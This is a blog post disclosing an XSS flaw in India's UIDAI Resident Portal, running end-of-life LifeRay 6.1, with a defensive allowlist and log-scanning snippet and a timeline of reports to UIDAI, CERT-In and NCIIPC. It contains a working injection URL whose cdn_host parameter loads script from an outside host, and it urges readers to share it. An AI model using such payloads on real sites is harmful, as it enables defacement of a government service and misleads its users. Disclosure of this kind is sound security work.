Vulnerability reported in resident.uidai.gov.in allows anyone to change content on the UIDAI website. The UIDAI Resident Portal has direct access to Aadhaar demographic data. The vulnerability (XSS) allows anyone to embed any tweet on the UIDAI website

The Vulnerability

The UIDAI Resident Portal (with read access to the entire Aadhaar demographic data) is running a vulnerable version of LifeRay software. It is running LifeRay 6.1, which was declared End-of-Life in February 2016.

This release includes multiple known vulnerabilities, including:

  1. An XSS issue, for which a PoC can be found at resident.uidai.gov.in (Picture Credits: @sanitarypanels)
  2. Multiple RCEs: see issue-62, for example.

In fact the release is so old it does not even appear on the “Known Vulnerabilities” page on the LifeRay website; you have to go look at their Archived Vulnerabilities.

The PoC

You can find a simple Proof of Concept for the XSS issue at resident.uidai.gov.in.

The cdn_host parameter injects JavaScript from $CDN_HOST/Resident-theme/js/custom.js; in this case https://scan.bb8.fun/Resident-theme/js/custom.js, which hosts a small snippet that overwrites the HTML of the page.

It shows up like:


Fun

The current script allows for embedding any tweet using a tweet parameter. To embed:

Go to any tweet, copy the part after twitter.com and pass it as the tweet parameter. For example, to embed this tweet:

Aadhaar Compound Wall (@13footwall):

Breaking: Exclusive footage from inside @UIDAI‘s IT department after media reports of Aadhaar data leaks.


  1. Look at the URL: https://twitter.com/13footwall/status/979301578686345216
  2. Copy 13footwall/status/979301578686345216 and pass it as the tweet parameter:
  3. The URL becomes https://resident.uidai.gov.in/?cdn_host=https://scan.bb8.fun&tweet=13footwall/status/979301578686345216
  4. SHARE IT
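The root cause of the PoC above is that a request parameter (cdn_host) is turned directly into a script source. As an added example (not the portal's or LifeRay's code; the allowlist of CDN origins is hypothetical and the log lines are constructed), the following shows a strict origin allowlist for such a parameter and the same check run over access-log lines to flag requests that pointed it at a foreign host:

```python
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist of origins the site may load theme assets from (hypothetical:
# the page does not say whether the portal has a legitimate external CDN at all).
DEFAULT_ORIGIN = "https://resident.uidai.gov.in"
ALLOWED_CDN_ORIGINS = frozenset({DEFAULT_ORIGIN, "https://static.example-cdn.invalid"})

def allowed_cdn_origin(value):
    """Return the normalised origin of value if it is allowlisted, else None.

    Comparing the whole scheme://host[:port], not a prefix or substring, also
    rejects look-alikes such as https://resident.uidai.gov.in.evil.invalid and
    https://resident.uidai.gov.in@evil.invalid (userinfo is part of netloc).
    """
    parts = urlsplit(value.strip())
    if parts.scheme != "https" or not parts.netloc:
        return None
    origin = f"https://{parts.netloc.lower()}"
    return origin if origin in ALLOWED_CDN_ORIGINS else None

def resolve_cdn_origin(cdn_host):
    """Origin for the script tag: the allowlisted value, else the site itself."""
    return (allowed_cdn_origin(cdn_host) if cdn_host else None) or DEFAULT_ORIGIN

def script_tag(cdn_host):
    """Build the theme <script> from the validated origin, never the raw parameter."""
    return f'<script src="{resolve_cdn_origin(cdn_host)}/Resident-theme/js/custom.js"></script>'

def find_foreign_cdn_requests(access_log_lines):
    """Yield (client_ip, cdn_host) for requests whose cdn_host is not allowlisted.

    Expects common-log-format lines with a quoted request; malformed lines are skipped.
    """
    for line in access_log_lines:
        try:
            request_path = line.split('"')[1].split(" ")[1]  # e.g. '/?cdn_host=...'
        except IndexError:
            continue
        for value in parse_qs(urlsplit(request_path).query).get("cdn_host", []):
            if allowed_cdn_origin(value) is None:
                yield line.split(" ")[0], value

# Constructed sample log lines, not real traffic; evil.invalid is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Mar/2018:10:00:01 +0530] "GET /?cdn_host=https://evil.invalid&tweet=x/status/1 HTTP/1.1" 200 5120',
    '198.51.100.2 - - [18/Mar/2018:10:00:05 +0530] "GET /?cdn_host=https://resident.uidai.gov.in/ HTTP/1.1" 200 5120',
    '198.51.100.9 - - [18/Mar/2018:10:00:09 +0530] "GET /about HTTP/1.1" 200 2048',
]
```

Run over real access logs, the same function gives a quick retrospective check for whether the parameter was ever pointed off-site.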

The Report

I initially reported this to help@uidai.gov.in in Jan 2017:

Forgot all about it till Jan 2018, when someone mentioned I should try my luck with CERT-IN instead:

This is still not fixed. Here is a complete timeline:

Date        | What?
16 Jan 2017 | Initially reported to help@uidai.gov.in. No response
21 Jan 2018 | Reported to ceo@uidai.gov.in and info@cert-in.org.in. No response
19 Feb 2018 | Reminder sent to ceo@uidai.gov.in and info@cert-in.org.in
19 Feb 2018 | Acknowledgement from CERT
15 Mar 2018 | Reminder sent. No response
17 Mar 2018 | Notified NCIIPC
18 Mar 2018 | Confirmation from NCIIPC asking for more details. I replied back with a quote of the previous exchange
19 Mar 2018 | Confirmation from NCIIPC thanking me for the report
19 Apr 2018 | Reminder sent to UIDAI asking for acknowledgement
30 May 2018 | Reminder sent to NCIIPC and CERT asking for updates

The only change that I’m aware of since my initial report is that the website stopped declaring the LifeRay version in an HTTP response header.


Originally published here.
